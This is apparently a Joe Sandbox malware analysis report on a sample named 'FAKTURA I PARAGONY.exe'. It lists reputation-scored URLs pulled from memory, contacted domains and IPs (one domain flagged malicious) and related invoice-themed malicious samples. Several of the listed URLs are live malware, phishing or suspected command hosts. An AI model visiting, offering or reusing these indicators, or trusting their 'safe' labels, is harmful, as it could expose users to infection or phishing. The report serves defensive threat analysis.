http://rghost.net/download/	0%	Avira URL Cloud	safe
http://127.0.0.1:8000/web.html?url=yac.mx&rate=501&id=%s&key=%s&pm=1x	0%	Avira URL Cloud	safe
http://install.outbrowse.com/logTrack.php?x	0%	Avira URL Cloud	safe
http://usa-national.info/gpu/band/grumble.dot	0%	Avira URL Cloud	safe
http://w.robints.us/cnzz.htmlwidth=0height=0	0%	Avira URL Cloud	safe
https://jovial-pasteur.159-89-118-202.plesk.page/wp-content/uploads/index.php	0%	Avira URL Cloud	safe
http://canonicalizer.ucsuri.tcs/3	0%	Avira URL Cloud	safe
http://sesame96.orange.ero0101.com/set_inf.php?id=ero257.wmv&sid=	0%	Avira URL Cloud	safe
http://mexicorxonline.com/glad/imagenes.html?disc=abuse&code=7867213	0%	Avira URL Cloud	safe
http://spywaresoftstop.com/load.php?adv=141	0%	Avira URL Cloud	safe
https://sotheraho.com/wp-content/fonts/reportexcelnew.php	0%	Avira URL Cloud	safe
http://walden.co.jp/wp/divorce/divorce.php?id=zxjpyy5tb3jyaxnvb	0%	Avira URL Cloud	safe
http://eduardovolpi.com.br/flipbook/postal/services/parcel)	0%	Avira URL Cloud	safe
https://sweetsizing.com/vip/	0%	Avira URL Cloud	safe
http://security-updater.com/binaries/	0%	Avira URL Cloud	safe
http://www.fbcom.review/d/9.doc	0%	Avira URL Cloud	safe
http://5starvideos.com/main/K5	0%	Avira URL Cloud	safe
http://aklick.info/d.php?date=	0%	Avira URL Cloud	safe
http://77.81.225.138/carnaval2017.zip	0%	Avira URL Cloud	safe
http://www.slotch.com/ist/softwares/v4.0/istdownload.exe	0%	Avira URL Cloud	safe
https://go.wikitextbooks.info	0%	Avira URL Cloud	safe
https://bemojo.com/ds/161120.gif	0%	Avira URL Cloud	safe
http://avnpage.info/final3.php	0%	Avira URL Cloud	safe
http://esiglass.it/glassclass/glass.php	0%	Avira URL Cloud	safe
https://xmrig.com/wizard	0%	Avira URL Cloud	safe
https://rotf.lol/3u6d9443	0%	Avira URL Cloud	safe
https://kiwisanagustin.com/wp-admin/includes/opo.php%22%20method%3d%22post%22%20style%3d%22box-sizin	0%	Avira URL Cloud	safe
https://raw.githubusercontent.com/	0%	Avira URL Cloud	safe
http://m.mworld.vn/MWorld30/data20.xm?a=getip&g=3&sex=Android	0%	Avira URL Cloud	safe
http://www.niepicowane.pl/	0%	Avira URL Cloud	safe
http://office-service-secs.com/blm.task	0%	Avira URL Cloud	safe
http://www.51jetso.com/	0%	Avira URL Cloud	safe
https://irecruiter.immentia.com/storage/framework/cache/data/0e/nC7vWe43YwJjj.php	0%	Avira URL Cloud	safe
http://js.f4321y.com/	0%	Avira URL Cloud	safe
http://www.searchmaid.com/	0%	Avira URL Cloud	safe
http://tbapi.search.ask.comxb	0%	Avira URL Cloud	safe
http://www.mva.by/tags/ariscanin1.e	0%	Avira URL Cloud	safe
http://javafx.com	0%	Avira URL Cloud	safe
http://masgiO.info/cd/cd.php?id=%s&ver=g	0%	Avira URL Cloud	safe
http://sds.clrsch.com/x	0%	Avira URL Cloud	safe
https://blackstonesbarandgrill.net/wp-includes/js/service/jp/login.php	100%	Avira URL Cloud	phishing
http://boscumix.com/optima/index.php	0%	Avira URL Cloud	safe
http://playsong.mediasongplayer.com/	0%	Avira URL Cloud	safe
http://207.154.225.82/report.json?type=mail&u=$muser&c=	0%	Avira URL Cloud	safe
http://app.whenu.com/Offers	0%	Avira URL Cloud	safe
http://www.xiuzhe.com/ddvan.exe	0%	Avira URL Cloud	safe
http://66.148.74.7/zu2/zc.php	0%	Avira URL Cloud	safe
http://t.zer9g.com/	0%	Avira URL Cloud	safe
http://149.3.170.235/qw-fad/	0%	Avira URL Cloud	safe
http://maringareservas.com.br/queda/index.php	0%	Avira URL Cloud	safe
http://shdjhgftyhgjklolkjio.dns.navy/bcz/document.doc	100%	Avira URL Cloud	malware
http://seunelson.com.br/js/content.xml	0%	Avira URL Cloud	safe
http://costacars.es/ico/ortodox.php	100%	Avira URL Cloud	malware
http://82.98.235.	0%	Avira URL Cloud	safe
http://verred.net/?1309921	0%	Avira URL Cloud	safe
https://pigeonious.com/img/	0%	Avira URL Cloud	safe
http://team.afcorp.afg/chr/crt-ho_30/newjflibrary	0%	Avira URL Cloud	safe
http://data1.yoou8.com/	0%	Avira URL Cloud	safe
https://jabaltoor.com/copy/img/blog/cat-post/r7gnor1h0.php	0%	Avira URL Cloud	safe
http://handjobheats.com/xgi-bin/q.php	0%	Avira URL Cloud	safe
http://www.pcpurifier.com/buynow/?	0%	Avira URL Cloud	safe
http://www.chatzum.com/statistics/?affid=$RPT_AFFID&cztbid=$RPT_UID&inst=$RTP_SETINST&sethp=$RTP_SET	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
tccinfaes.com	188.93.227.195	true	true	3%, Virustotal, Browse	unknown
drive.google.com	172.217.168.46	true	false		high
googlehosted.l.googleusercontent.com	142.250.185.161	true	false		high
mail.tccinfaes.com	unknown	unknown	true	11%, Virustotal, Browse	unknown
x1.i.lencr.org	unknown	unknown	true	0%, Virustotal, Browse	unknown
doc-00-88-docs.googleusercontent.com	unknown	unknown	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://110.42.4.180:	true	Avira URL Cloud: safe	unknown
http://stmichaelolivewood.com/templates/landofchrist/css/msg.jpg	true	Avira URL Cloud: safe	unknown
http://tempuri.org/	true	Avira URL Cloud: safe	unknown
http://www.whitehouseknutsford.co.uk/invoice-status/please-pull-invoice-684594/	true	Avira URL Cloud: safe	unknown
http://spywaresoftstop.com/load.php?adv=141	true	Avira URL Cloud: safe	unknown
http://masgiO.info/cd/cd.php?id=%s&ver=g	true	Avira URL Cloud: safe	unknown
http://www.trotux.com/?z=	false		high
http://avnisevinc.blogspot.com/	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://kiranacorp.com/oja	MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.bonusesfound.ml/update/index.php	MpSigStub.exe, 00000023.00000003.6267325282.0000028BD7515000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.cooctdlfast.com/download.php?	MpSigStub.exe, 00000023.00000003.6324018589.0000028BD69FC000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://minetopsforums.ru/new_link3.php?site=	MpSigStub.exe, 00000023.00000003.6328027500.0000028BD6832000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://today-friday.cn/maran/sejvan/get.php	MpSigStub.exe, 00000023.00000003.6438080287.0000028BD7556000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://Yyl.mofish.cn/interface/SeedInstall.aspx	MpSigStub.exe, 00000023.00000003.6431685607.0000028BD6D56000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://ati.vn	MpSigStub.exe, 00000023.00000003.6338781268.0000028BD70B3000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://errors.statsmyapp.comxa	MpSigStub.exe, 00000023.00000003.6322023418.0000028BD7EF7000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.chambersign.org1	MpSigStub.exe, 00000023.00000003.6345763717.0000028BD65BB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://185.172.110.217/robx/remit.jpg	MpSigStub.exe, 00000023.00000003.6428681257.0000028BD5FA3000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://anonfiles.com/	MpSigStub.exe, 00000023.00000003.6301785848.0000028BD7C0A000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://sumnermail.org/sumnerscools/school.php	MpSigStub.exe, 00000023.00000003.6299498937.0000028BD6FED000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://139.162.	MpSigStub.exe, 00000023.00000003.6315606620.0000028BD6CD3000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
http://rghost.net/download/	MpSigStub.exe, 00000023.00000003.6323594204.0000028BD69BA000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://www.dropbox.com/	MpSigStub.exe, 00000023.00000003.6309579817.0000028BD8040000.00000004.00000001.sdmp, MpSigStub.exe, 00000023.00000003.6338116203.0000028BD7305000.00000004.00000001.sdmp	false		high
http://127.0.0.1:8000/web.html?url=yac.mx&rate=501&id=%s&key=%s&pm=1x	MpSigStub.exe, 00000023.00000003.6290963131.0000028BD73CB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://install.outbrowse.com/logTrack.php?x	MpSigStub.exe, 00000023.00000003.6320105225.0000028BD6890000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://usa-national.info/gpu/band/grumble.dot	MpSigStub.exe, 00000023.00000003.6341363005.0000028BD7DAE000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://w.robints.us/cnzz.htmlwidth=0height=0	MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://akrilikkapak.blogspot.com/	MpSigStub.exe, 00000023.00000003.6315606620.0000028BD6CD3000.00000004.00000001.sdmp	false		high
https://jovial-pasteur.159-89-118-202.plesk.page/wp-content/uploads/index.php	MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://canonicalizer.ucsuri.tcs/3	MpSigStub.exe, 00000023.00000003.6289828443.0000028BD74D2000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://sesame96.orange.ero0101.com/set_inf.php?id=ero257.wmv&sid=	MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://actresswallpaperbollywood.blogspot.com/	MpSigStub.exe, 00000023.00000003.6265938697.0000028BD6B47000.00000004.00000001.sdmp	false		high
http://mexicorxonline.com/glad/imagenes.html?disc=abuse&code=7867213	MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://lo0oading.blogspot.com/	MpSigStub.exe, 00000023.00000003.6280430921.0000028BD7B02000.00000004.00000001.sdmp	false		high
http://www.youtube.com/watch?v=Vjp7vgj119s	MpSigStub.exe, 00000023.00000003.6326794298.0000028BD64F4000.00000004.00000001.sdmp	false		high
https://sotheraho.com/wp-content/fonts/reportexcelnew.php	MpSigStub.exe, 00000023.00000003.6291965399.0000028BD7440000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://walden.co.jp/wp/divorce/divorce.php?id=zxjpyy5tb3jyaxnvb	MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://eduardovolpi.com.br/flipbook/postal/services/parcel)	MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://sweetsizing.com/vip/	MpSigStub.exe, 00000023.00000003.6422489024.0000028BD6EA1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://tikotin.com	MpSigStub.exe, 00000023.00000003.6322023418.0000028BD7EF7000.00000004.00000001.sdmp	false		high
http://security-updater.com/binaries/	MpSigStub.exe, 00000023.00000003.6313262116.0000028BD723F000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fbcom.review/d/9.doc	MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://5starvideos.com/main/K5	MpSigStub.exe, 00000023.00000003.6281089235.0000028BD7E5F000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://aklick.info/d.php?date=	MpSigStub.exe, 00000023.00000003.6438769310.0000028BD7F39000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://77.81.225.138/carnaval2017.zip	MpSigStub.exe, 00000023.00000003.6311571113.0000028BD79D4000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.slotch.com/ist/softwares/v4.0/istdownload.exe	MpSigStub.exe, 00000023.00000003.6307279106.0000028BD6061000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://go.wikitextbooks.info	MpSigStub.exe, 00000023.00000003.6315331031.0000028BD6126000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://aartemis.com/?type=sc&ts=	MpSigStub.exe, 00000023.00000003.6309579817.0000028BD8040000.00000004.00000001.sdmp	false		high
https://tinyurl.com/up77pck	MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmp	false		high
https://bemojo.com/ds/161120.gif	MpSigStub.exe, 00000023.00000003.6436106917.0000028BD69FC000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.mvps.org/vb	MpSigStub.exe, 00000023.00000003.6345763717.0000028BD65BB000.00000004.00000001.sdmp	false		high
http://avnpage.info/final3.php	MpSigStub.exe, 00000023.00000003.6431685607.0000028BD6D56000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://esiglass.it/glassclass/glass.php	MpSigStub.exe, 00000023.00000003.6283686217.0000028BD64B3000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://xmrig.com/wizard	MpSigStub.exe, 00000023.00000003.6264485610.0000028BD7D13000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.activision.com/games/wolfenstein/purchase.html	MpSigStub.exe, 00000023.00000003.6296840471.0000028BD7347000.00000004.00000001.sdmp	false		high
https://rotf.lol/3u6d9443	MpSigStub.exe, 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://kiwisanagustin.com/wp-admin/includes/opo.php%22%20method%3d%22post%22%20style%3d%22box-sizin	MpSigStub.exe, 00000023.00000003.6429782920.0000028BD77E9000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://aerytyre.blogspot.com/	MpSigStub.exe, 00000023.00000003.6266507875.0000028BD63ED000.00000004.00000001.sdmp	false		high
http://blogsemasacaparnab.blogspot.com/	MpSigStub.exe, 00000023.00000003.6312196496.0000028BD70F5000.00000004.00000001.sdmp	false		high
https://raw.githubusercontent.com/	MpSigStub.exe, 00000023.00000003.6345763717.0000028BD65BB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://eeyhh567.s3.eu-west-3.amazonaws.com/image2.png	MpSigStub.exe, 00000023.00000003.6317668915.0000028BD6D56000.00000004.00000001.sdmp	false		high
https://mort2021.s3-eu-west-1.amazonaws.com/image2.png	MpSigStub.exe, 00000023.00000003.6434103017.0000028BD7BC7000.00000004.00000001.sdmp	false		high
http://m.mworld.vn/MWorld30/data20.xm?a=getip&g=3&sex=Android	MpSigStub.exe, 00000023.00000003.6320629595.0000028BD71FC000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.niepicowane.pl/	MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://office-service-secs.com/blm.task	MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.51jetso.com/	MpSigStub.exe, 00000023.00000003.6289461513.0000028BD744F000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://bit.ly/3kvdcmi	MpSigStub.exe, 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmp	false		high
https://irecruiter.immentia.com/storage/framework/cache/data/0e/nC7vWe43YwJjj.php	MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://js.f4321y.com/	MpSigStub.exe, 00000023.00000003.6429470799.0000028BD77A7000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.searchmaid.com/	MpSigStub.exe, 00000023.00000003.6292767693.0000028BD7F7B000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://remote.bittorrent.com	MpSigStub.exe, 00000023.00000003.6315879958.0000028BD6D14000.00000004.00000001.sdmp	false		high
http://wac.edgecastcdn.net/800952/5b595c13-aea5-4a6c-a099-d29c4678f6f2-api/gfbs	MpSigStub.exe, 00000023.00000003.6339082124.0000028BD7EB5000.00000004.00000001.sdmp	false		high
http://tbapi.search.ask.comxb	MpSigStub.exe, 00000023.00000003.6322023418.0000028BD7EF7000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.mva.by/tags/ariscanin1.e	MpSigStub.exe, 00000023.00000003.6430060790.0000028BD7CD0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://javafx.com	MpSigStub.exe, 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://sds.clrsch.com/x	MpSigStub.exe, 00000023.00000003.6313892884.0000028BD728C000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://blackstonesbarandgrill.net/wp-includes/js/service/jp/login.php	MpSigStub.exe, 00000023.00000003.6439110180.0000028BD7F7A000.00000004.00000001.sdmp	true	Avira URL Cloud: phishing	unknown
http://boscumix.com/optima/index.php	MpSigStub.exe, 00000023.00000003.6439110180.0000028BD7F7A000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://playsong.mediasongplayer.com/	MpSigStub.exe, 00000023.00000003.6316424698.0000028BD7976000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://207.154.225.82/report.json?type=mail&u=$muser&c=	MpSigStub.exe, 00000023.00000003.6346459854.0000028BD6536000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://app.whenu.com/Offers	MpSigStub.exe, 00000023.00000003.6296840471.0000028BD7347000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.xiuzhe.com/ddvan.exe	MpSigStub.exe, 00000023.00000003.6326794298.0000028BD64F4000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://66.148.74.7/zu2/zc.php	MpSigStub.exe, 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://t.zer9g.com/	MpSigStub.exe, 00000023.00000003.6313733707.0000028BD7280000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://149.3.170.235/qw-fad/	MpSigStub.exe, 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://maringareservas.com.br/queda/index.php	MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://shdjhgftyhgjklolkjio.dns.navy/bcz/document.doc	MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	true	Avira URL Cloud: malware	unknown
http://seunelson.com.br/js/content.xml	MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://costacars.es/ico/ortodox.php	MpSigStub.exe, 00000023.00000003.6264075284.0000028BD8107000.00000004.00000001.sdmp	true	Avira URL Cloud: malware	unknown
http://82.98.235.	MpSigStub.exe, 00000023.00000003.6287012861.0000028BD6A98000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
http://verred.net/?1309921	MpSigStub.exe, 00000023.00000003.6437087417.0000028BD682E000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://pigeonious.com/img/	MpSigStub.exe, 00000023.00000003.6338449567.0000028BD8082000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://team.afcorp.afg/chr/crt-ho_30/newjflibrary	MpSigStub.exe, 00000023.00000003.6282961298.0000028BD6AC6000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://artishollywoodbikini.blogspot.com/	MpSigStub.exe, 00000023.00000003.6319059958.0000028BD62F3000.00000004.00000001.sdmp	false		high
http://data1.yoou8.com/	MpSigStub.exe, 00000023.00000003.6434103017.0000028BD7BC7000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://jabaltoor.com/copy/img/blog/cat-post/r7gnor1h0.php	MpSigStub.exe, 00000023.00000003.6267925507.0000028BD6E61000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://bit.ly/3kthd4j	MpSigStub.exe, 00000023.00000003.6326794298.0000028BD64F4000.00000004.00000001.sdmp	false		high
http://handjobheats.com/xgi-bin/q.php	MpSigStub.exe, 00000023.00000003.6438080287.0000028BD7556000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.pcpurifier.com/buynow/?	MpSigStub.exe, 00000023.00000003.6282378484.0000028BD702F000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.chatzum.com/statistics/?affid=$RPT_AFFID&cztbid=$RPT_UID&inst=$RTP_SETINST&sethp=$RTP_SET	MpSigStub.exe, 00000023.00000003.6267925507.0000028BD6E61000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
172.217.168.46	drive.google.com	United States	15169	GOOGLEUS	false
188.93.227.195	tccinfaes.com	Portugal	8426	CLARANET-ASClaraNETLTDGB	true
142.250.185.161	googlehosted.l.googleusercontent.com	United States	15169	GOOGLEUS	false

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	1622
Start date:	12.10.2021
Start time:	16:33:17
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 19m 39s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	FAKTURA I PARAGONY.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Run name:	Suspected Instruction Hammering
Number of analysed new started processes analysed:	48
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.rans.spre.troj.spyw.expl.evad.mine.winEXE@12/14@4/3
EGA Information:	Failed
HDC Information:	Failed
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, audiodg.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, ShellExperienceHost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe TCP Packets have been reduced to 100 Excluded IPs from analysis (whitelisted): 20.82.207.122, 20.82.19.171, 52.152.108.96, 40.125.122.151, 20.54.89.15, 40.125.122.176, 52.152.110.14, 20.199.120.151, 20.82.210.154, 92.123.195.50, 92.123.195.73, 2.21.140.114, 8.248.113.254, 67.27.157.126, 67.26.83.254, 8.248.135.254, 8.248.115.254, 20.50.102.62, 104.89.32.83, 209.197.3.8, 104.89.38.104, 2.21.143.74, 2.21.140.235 Excluded domains from analysis (whitelisted): definitionupdates.microsoft.com.edgekey.net, fg.download.windowsupdate.com.c.footprint.net, e8652.dscx.akamaiedge.net, slscr.update.microsoft.com, e13678.dscb.akamaiedge.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net, fe3.delivery.dsp.mp.microsoft.com.nsatc.net, e11290.dspg.akamaiedge.net, wns.notify.trafficmanager.net, www.microsoft.com-c-3.edgekey.net, go.microsoft.com, arc.trafficmanager.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, slscr.update.microsoft.com.akadns.net, crl.root-x1.letsencrypt.org.edgekey.net, definitionupdates.microsoft.com, client.wns.windows.com, fs.microsoft.com, e3673.g.akamaiedge.net, sls.update.microsoft.com.akadns.net, wu-shim.trafficmanager.net, wd-prod-cp-eu-north-2-fe.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, wdcp.microsoft.com, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, wd-prod-cp.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, sls.emea.update.microsoft.com.akadns.net, wdcpalt.microsoft.com, fe3.delivery.mp.microsoft.com, go.microsoft.com.edgekey.net, wd-prod-cp-eu-west-2-fe.westeurope.cloudapp.azure.com, www.microsoft.com Not all processes where analyzed, report is missing behavior information Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtEnumerateKey calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found. Report size getting too big, too many NtReadVirtualMemory calls found. Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
16:36:01	API Interceptor	2658x Sleep call for process: RegAsm.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
188.93.227.195	COPIA DE PAGO.exe	Get hash	malicious	Browse
	orientite.exe	Get hash	malicious	Browse
	PO.exe	Get hash	malicious	Browse
	DDC50015.exe	Get hash	malicious	Browse
	Facturas Pagadas al Vencimiento.exe	Get hash	malicious	Browse
	DHL00051021_PDF.exe	Get hash	malicious	Browse
	FACTURA.exe	Get hash	malicious	Browse
	FACTURA.exe	Get hash	malicious	Browse
	seeds.exe	Get hash	malicious	Browse
	Product LIsts.exe	Get hash	malicious	Browse
	FACTURA Y ALBARANES_pdf.exe	Get hash	malicious	Browse
	Scan.exe	Get hash	malicious	Browse
	Ticari Hesap #U00d6zetiniz.exe	Get hash	malicious	Browse
	Struggleres5.exe	Get hash	malicious	Browse
	BBVA-Confirming Remesas Aceptadas.exe	Get hash	malicious	Browse
	FACTURA.exe	Get hash	malicious	Browse
	FACTURA.exe	Get hash	malicious	Browse
	Payment_Advice.exe	Get hash	malicious	Browse
	SHUNYUE 19-EPDA PARTICULAR.exe	Get hash	malicious	Browse
	FACTURA.exe	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
CLARANET-ASClaraNETLTDGB	COPIA DE PAGO.exe	Get hash	malicious	Browse	188.93.227.195
	sora.arm	Get hash	malicious	Browse	195.102.64.245
	LSCtJ6YbhB	Get hash	malicious	Browse	195.102.64.215
	orientite.exe	Get hash	malicious	Browse	188.93.227.195
	PO.exe	Get hash	malicious	Browse	188.93.227.195
	DDC50015.exe	Get hash	malicious	Browse	188.93.227.195
	UnHAnaAW.x86	Get hash	malicious	Browse	212.49.223.21
	yR25n6pfMS	Get hash	malicious	Browse	195.157.0.198
	Facturas Pagadas al Vencimiento.exe	Get hash	malicious	Browse	188.93.227.195
	DHL00051021_PDF.exe	Get hash	malicious	Browse	188.93.227.195
	FACTURA.exe	Get hash	malicious	Browse	188.93.227.195
	FACTURA.exe	Get hash	malicious	Browse	188.93.227.195
	JE91d4cv34	Get hash	malicious	Browse	81.171.235.227
	seeds.exe	Get hash	malicious	Browse	188.93.227.195
	Product LIsts.exe	Get hash	malicious	Browse	188.93.227.195
	FACTURA Y ALBARANES_pdf.exe	Get hash	malicious	Browse	188.93.227.195
	Scan.exe	Get hash	malicious	Browse	188.93.227.195
	Ticari Hesap #U00d6zetiniz.exe	Get hash	malicious	Browse	188.93.227.195
	Struggleres5.exe	Get hash	malicious	Browse	188.93.227.195
	BBVA-Confirming Remesas Aceptadas.exe	Get hash	malicious	Browse	188.93.227.195

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
37f463bf4616ecd445d4a1937da06e19	vk5MXd2Rxm.msi	Get hash	malicious	Browse	172.217.168.46 142.250.185.161
	COPIA DE PAGO.exe	Get hash	malicious	Browse	172.217.168.46 142.250.185.161
	INV.ppt	Get hash	malicious	Browse	172.217.168.46 142.250.185.161
	jtht8EV6uw.exe	Get hash	malicious	Browse	172.217.168.46 142.250.185.161
	RFQ_Project 20211012 thyssenkrupp Industrial Solutions AG 6000358077_PDF.exe	Get hash	malicious	Browse	172.217.168.46 142.250.185.161
	shipping docs.exe	Get hash	malicious	Browse	172.217.168.46 142.250.185.161
	20znh7W3Y1.exe	Get hash	malicious	Browse	172.217.168.46 142.250.185.161
	Foreign_Bank Account Details.exe	Get hash	malicious	Browse	172.217.168.46 142.250.185.161
	In#U1d20oice-yceeBSo.vbs	Get hash	malicious	Browse	172.217.168.46 142.250.185.161
	SOA.exe	Get hash	malicious	Browse	172.217.168.46 142.250.185.161
	184285013-044310-sanlccjavap0003-7069_pdf (5).exe	Get hash	malicious	Browse	172.217.168.46 142.250.185.161
	SecuriteInfo.com.Variant.Razy.961905.21681.exe	Get hash	malicious	Browse	172.217.168.46 142.250.185.161
	Statement of Account of Sep 2021.exe	Get hash	malicious	Browse	172.217.168.46 142.250.185.161
